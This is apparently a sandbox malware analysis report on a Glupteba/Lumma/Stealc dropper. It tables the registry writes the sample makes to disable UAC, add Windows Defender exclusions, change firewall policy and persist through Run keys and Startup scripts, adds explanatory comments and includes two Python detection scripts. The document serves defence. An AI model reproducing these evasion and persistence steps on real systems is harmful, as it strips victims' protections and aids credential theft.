Malware Analysis Report

2024-11-30 02:12

Sample ID 240329-ca85qafa57
Target adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8
SHA256 adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8
Tags
glupteba lumma rhadamanthys discovery dropper evasion loader persistence rootkit spyware stealer trojan upx stealc themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8

Threat Level: Known bad

The file adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8 was found to be: Known bad.

Malicious Activity Summary

glupteba lumma rhadamanthys discovery dropper evasion loader persistence rootkit spyware stealer trojan upx stealc themida

UAC bypass

Modifies firewall policy service

Lumma Stealer

Rhadamanthys

Glupteba payload

Stealc

Glupteba

Detects DLL dropped by Raspberry Robin.

Suspicious use of NtCreateUserProcessOtherParentProcess

Windows security bypass

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies boot configuration data using bcdedit

Drops file in Drivers directory

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Downloads MZ/PE file

Drops startup file

Themida packer

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of web browsers

Reads user/profile data of local email clients

UPX packed file

Reads data files stored by FTP clients

Loads dropped DLL

Windows security modification

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Manipulates WinMon driver.

Adds Run key to start application

Checks whether UAC is enabled

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Manipulates WinMonFS driver.

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Suspicious behavior: LoadsDriver

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

System policy modification

Runs ping.exe

Checks processor information in registry

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-29 01:53

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-29 01:53

Reported

2024-03-29 01:58

Platform

win10-20240221-en

Max time kernel

296s

Max time network

300s

Command Line

sihost.exe

Signatures

Detects DLL dropped by Raspberry Robin.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Parent PID spoofing: the process that issued the create call (Process column) assigned the new process a different parent through PROC_THREAD_ATTRIBUTE_PARENT_PROCESS (Target column), so anything that trusts the recorded parent sees the child hanging off sihost.exe rather than RegAsm.exe. RegAsm.exe is a signed .NET Framework utility that is routinely used as an injection host; a process tree rebuilt from parent PIDs alone hides this hop.
Description Indicator Process Target
PID 1936 created 2792 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe c:\windows\system32\sihost.exe
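The check a sandbox or an ETW consumer performs to raise the hit above, as an added example that is not part of the report: compare the PID that issued the create call with the parent the new process was given, and flag the mismatch. The row is read as creator 1936 (RegAsm.exe) creating 2792 with sihost.exe as the claimed parent; the sihost.exe PID (3040), the explorer.exe control row and the svchost.exe allow-list entry are constructed assumptions, not values from the report.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcessCreate:
    """One NtCreateUserProcess call as a sandbox hook or ETW provider records it."""
    caller_pid: int           # process that issued the call
    new_pid: int              # process that was created
    declared_parent_pid: int  # parent handed over via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
    caller_image: str


# Process table. 1936 -> RegAsm.exe and sihost.exe as the claimed parent come from the
# report row; PIDs 3040 and 4100 and the explorer.exe entry are constructed.
PROCESS_TABLE: Dict[int, str] = {
    1936: r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
    3040: r"C:\Windows\System32\sihost.exe",
    4100: r"C:\Windows\explorer.exe",
}

EVENTS: List[ProcessCreate] = [
    # report row "PID 1936 created 2792": creator RegAsm.exe, parent set to sihost.exe
    ProcessCreate(1936, 2792, 3040, PROCESS_TABLE[1936]),
    # constructed benign control: explorer starts a child and really is its parent
    ProcessCreate(4100, 5200, 4100, PROCESS_TABLE[4100]),
]

# Callers allowed to assign another parent. Tuning assumption: the AppInfo service
# (svchost.exe) re-parents UAC-elevated processes onto the requesting application.
ALLOWED_REPARENTING_CALLERS = {r"c:\windows\system32\svchost.exe"}


def find_ppid_spoofing(events: List[ProcessCreate], procs: Dict[int, str]) -> List[dict]:
    """Return one finding per create call whose caller is not the recorded parent."""
    findings = []
    for ev in events:
        if ev.caller_pid == ev.declared_parent_pid:
            continue  # ordinary CreateProcess: the caller is the parent
        if ev.caller_image.lower() in ALLOWED_REPARENTING_CALLERS:
            continue  # known legitimate re-parenting
        claimed = procs.get(ev.declared_parent_pid, f"pid {ev.declared_parent_pid}")
        # A Windows-directory parent claimed by a creator that is not a system service
        # is the shape in the report (RegAsm.exe hiding behind sihost.exe).
        severity = "high" if claimed.lower().startswith("c:\\windows\\") else "medium"
        findings.append({
            "new_pid": ev.new_pid,
            "real_creator": ev.caller_image,
            "claimed_parent": claimed,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in find_ppid_spoofing(EVENTS, PROCESS_TABLE):
        print(f)
```

The caller PID is only available where the create call itself is observed (a sandbox hook, a kernel callback or a telemetry provider that records it); event logs that store just the parent PID show the spoofed tree and cannot run this check after the fact.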

UAC bypass

evasion trojan
Setting EnableLUA to 0 switches UAC off for the whole machine rather than bypassing one prompt, and it only takes effect after a restart. The write goes to HKLM, which needs administrative rights, so the sample was already running elevated when it made the change.
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A

Windows security bypass

evasion trojan
Each exclusion is stored as a REG_DWORD of 0 under Exclusions\Paths or Exclusions\Processes; the "0" is the normal data for an entry, so the indicator is that the value exists, not what it holds. The excluded locations (C:\Windows\rss, C:\Windows\windefender.exe, the drivers directory, the csrss staging folder in Temp) are exactly where the dropped components land, so everything written there afterwards is skipped by real-time scanning.
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3XJHnNSbGYA02GO7UhIuxYV7.exe = "0" C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ubInWILwqwzq0r3tkzEDMPsx.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VMpmSW5lQOTKnoodNjiG90GW.exe = "0" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
The VBOX__ DSDT table name, the VBoxMiniRdrDN device opened further down and the BIOS version strings queried below are all VirtualBox-specific artifacts checked by name; on a hardened sandbox these are the values to rename, and on a real host a process that opens them has no legitimate reason to.
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A

Drops startup file

AddInProcess32.exe is a signed .NET Framework host that has no business writing Startup items; here it is acting as the injected host for a dropped payload, so the eleven .bat files below are that payload's persistence, not the framework's.
Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6Ujx0FkgOujLIpvEvgPzZBG.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brVPYbA4vLmXsiZt6ngzy9gS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9ClPaaTfFSjJ7F2XS18kucrz.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fSmmYIjftUxBkWVBxLq14JjW.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6zcnIu6wqBi9RsyxK6bvDaEC.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sebgSUOeCLmirLq2CeGcWdVf.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RpQHv5Sw4dQflCppsKI0rkHn.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TlE204QOpxj4AZibtawQYM6E.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ItLWQfghVwTQjVucLwFzPNFl.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HMuhMS13n2wzY7CCUZBNbdMv.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\r4NV2TWvJkrc6GurGOnktxvb.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
N/A N/A C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
N/A N/A C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
N/A N/A C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
N/A N/A C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
N/A N/A C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
N/A N/A C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GCGCBAECFC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ubInWILwqwzq0r3tkzEDMPsx.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3XJHnNSbGYA02GO7UhIuxYV7.exe = "0" C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VMpmSW5lQOTKnoodNjiG90GW.exe = "0" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
The genuine csrss.exe lives in System32 and is a protected process that is never started from a Run key; this value points at C:\Windows\rss\csrss.exe, the Glupteba install path, so the name is a masquerade. Four different droppers write the same value, which is why the entry repeats.
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
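The defence-evasion and persistence rows above (firewall policy write, EnableLUA = 0, Defender exclusions, Startup-folder .bat drops and the csrss Run key) turned into detection logic, as an added example that is not part of the report and not a Triage rule: a handful of events copied from those tables into Python records, plus a constructed benign OneDrive Run entry as a control, run through rules that map each match to its ATT&CK technique. The rule names, the system-binary list and the ATT&CK mapping are this example's choices.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import Callable, List, Optional


@dataclass
class Event:
    op: str                      # "set_value" or "file_created"
    path: str                    # registry value path or file path
    process: str                 # image path of the acting process
    value: Optional[str] = None  # registry data, if any


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe"
DROPPER = r"C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe"
RUN_KEY = r"\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Windows\CurrentVersion\Run"

# Rows taken from the behavioral2 signature tables, plus one constructed benign control.
EVENTS = [
    Event("set_value", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", SAMPLE, "0"),
    Event("set_value", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss", DROPPER, "0"),
    Event("set_value", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe", DROPPER, "0"),
    Event("set_value", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:" + "\\",
          r"C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe", "1"),
    Event("set_value", RUN_KEY + r"\csrss", r"C:\Windows\rss\csrss.exe", r'"C:\Windows\rss\csrss.exe"'),
    Event("file_created", r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6Ujx0FkgOujLIpvEvgPzZBG.bat",
          r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"),
    # constructed control: a normal per-user Run entry that must not fire
    Event("set_value", RUN_KEY + r"\OneDrive", r"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
          r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

SYSTEM_IMAGE_NAMES = {"csrss.exe", "smss.exe", "lsass.exe", "winlogon.exe", "svchost.exe", "services.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

RE_DEFENDER_EXCL = re.compile(r"\\Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\", re.I)
RE_FIREWALL_RULE = re.compile(r"\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\", re.I)
RE_RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
RE_STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)


def _run_command_image(value: str) -> str:
    """Pull the executable out of a Run-key command line, quoted or not."""
    value = value.strip()
    if value.startswith('"'):
        return value[1:value.find('"', 1)]
    return value.split(" ", 1)[0]


def _is_masqueraded_system_image(image: str) -> bool:
    """A protected-process name living outside System32/SysWOW64 (T1036.005)."""
    image = image.strip('"').lower()
    return ntpath.basename(image) in SYSTEM_IMAGE_NAMES and not ntpath.dirname(image).startswith(SYSTEM_DIRS)


@dataclass
class Rule:
    name: str
    attack_id: str
    match: Callable[[Event], bool]


RULES = [
    Rule("defender_exclusion_added", "T1562.001",
         lambda e: e.op == "set_value" and bool(RE_DEFENDER_EXCL.search(e.path))),
    Rule("uac_disabled_via_enablelua", "T1548.002",
         lambda e: e.op == "set_value" and e.path.lower().endswith(r"\policies\system\enablelua") and e.value == "0"),
    # Firewall rules are normally written by the firewall service itself, not by a user-profile binary.
    Rule("firewall_rule_written_by_non_system_process", "T1562.004",
         lambda e: e.op == "set_value" and bool(RE_FIREWALL_RULE.search(e.path)) and not e.process.lower().startswith(SYSTEM_DIRS)),
    Rule("run_key_to_masqueraded_system_binary", "T1547.001",
         lambda e: e.op == "set_value" and bool(RE_RUN_KEY.search(e.path)) and _is_masqueraded_system_image(_run_command_image(e.value or ""))),
    Rule("startup_folder_script_dropped", "T1547.001",
         lambda e: e.op == "file_created" and bool(RE_STARTUP_DIR.search(e.path)) and e.path.lower().endswith((".bat", ".cmd", ".vbs", ".js", ".lnk"))),
]


def triage(events: List[Event], rules: List[Rule] = RULES) -> List[dict]:
    """Return one hit per (event, rule) pair, tagged with the ATT&CK technique."""
    hits = []
    for e in events:
        for r in rules:
            if r.match(e):
                hits.append({"rule": r.name, "attack": r.attack_id,
                             "process": ntpath.basename(e.process), "indicator": e.path})
    return hits


if __name__ == "__main__":
    for h in triage(EVENTS):
        print(f'{h["attack"]:10} {h["rule"]:45} {h["process"]}')
```

The Run-key rule deliberately keys on name-versus-location rather than on the path C:\Windows\rss, so it still fires when the next build of the dropper picks a different directory; the Defender rule fires on the existence of the exclusion value, which is what makes the "0" data irrelevant.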

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
WinMonFS is the device name exposed by the kernel driver associated with Glupteba's rootkit component (WinMon/WinMonFS); the user-mode csrss.exe opening it is the payload talking to its own driver, which is also why the drivers directory was added to the Defender exclusions earlier.
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Two unrelated things are mixed in this table: uSEC49v5Ra5WAKyOQGf1eIdn.exe writing C:\Windows\System32\GroupPolicy\Machine\Registry.pol and gpt.ini is a local group policy change (the "System policy modification" hit in the summary), while the repeated StartupProfileData-Interactive, ModuleAnalysisCache and UsageLogs writes are ordinary powershell.exe start-up side effects under the SYSTEM profile and carry no signal on their own.
Description Indicator Process Target
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A
